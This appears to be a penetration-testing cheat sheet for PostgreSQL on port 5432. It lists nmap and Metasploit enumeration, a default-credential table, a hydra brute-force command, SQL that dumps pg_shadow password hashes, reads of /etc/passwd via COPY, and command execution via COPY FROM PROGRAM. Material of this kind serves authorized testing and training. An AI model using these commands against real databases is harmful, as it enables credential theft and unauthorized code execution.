# 5432 - PostgresSQL
PostgreSQL is an open source database which can be found mostly in Linux operating systems. However it has great compatibility with multiple operating systems and it can run in Windows and MacOS platforms as well. If the database is not properly configured and credentials have been obtained then it is possible to perform various activities like read and write system files and execution of arbitrary code.
## Enumeration
### Nmap
**Version disclosure**
`Use nmap -sV -p 5432 10.0.0.1`
**Bruteforce credentials:**
`nmap -p 5432 --script pgsql-brute`
### Metasploit
**Version disclosure**
`auxiliary/scanner/postgres/postgres_version`
**Bruteforce login:**
`auxiliary/scanner/postgres/postgres_login`
**Dump scheme:**
`auxiliary/scanner/postgres/postgres_schemadump`
**Database enumeration:**
`auxiliary/admin/postgres/postgres_sql`
**Hashdump:**
`auxiliary/scanner/postgres/postgres_hashdump`
**Read files:**
`auxiliary/admin/postgres/postgres_readfile`
**Reverse shell**
`exploit/linux/postgres/postgres_payload`
## Login
Login using psql:
`psql -h 192.168.100.11 -U postgres`
## Common/default credentials
| Username | Password |
| -------- | -------- |
| postgres | postgres |
| postgres | password |
| postgres | admin |
| admin | admin |
| admin | password |
### Bruteforce login credentials:
```
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120 postgres
```
## Commands
| Description | Command |
| ----------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| List databases | \l |
| List databases users | \du |
| List existing tables | \dt |
| Connect to a specific database | \c database\_name; |
| Get detailed information on a table | \d+ table\_name |
| Get table content | select \* from table\_name; |
| Retrieving database passwords | SELECT \* FROM users;
OR
select usename, passwd from pg\_shadow
|
| Dumping databases content | SELECT usename, passwd FROM pg\_shadow;
OR
pg\_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output\_pgdump
|
| Create a new database | CREATE DATABASE \[IF NOT EXISTS] db\_name; |
| exit the database | \q |
## Command execution
PostgreSQL databases can interact with the underlying operating by allowing the database administrator to execute various database commands and retrieve output from the system.
Run:
`postgres=# select pg_ls_dir('./');`
By executing the following command it is possible to read server side postgres files.
`postgres=# select pg_read_file('PG_VERSION', 0, 200);`
It is also possible to create a database table in order to store and view contents of a file that exist in the host.
```
postgres-# CREATE TABLE temp(t TEXT);
postgres-# COPY temp FROM '/etc/passwd';
postgres-# SELECT * FROM temp;
```
OR use the metasploit module
`Auxiliary/admin/postgres/postgres_readfile`
### Execute command
```
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'sudo -l';
SELECT * FROM cmd_exec;
```